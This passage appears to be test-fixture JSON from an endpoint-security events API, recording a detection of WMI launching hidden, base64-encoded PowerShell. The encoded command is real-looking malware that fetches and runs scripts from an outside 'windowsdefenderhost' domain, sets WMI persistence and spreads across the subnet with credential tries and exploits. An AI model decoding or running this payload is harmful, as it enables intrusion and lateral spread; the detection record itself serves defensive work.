HUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC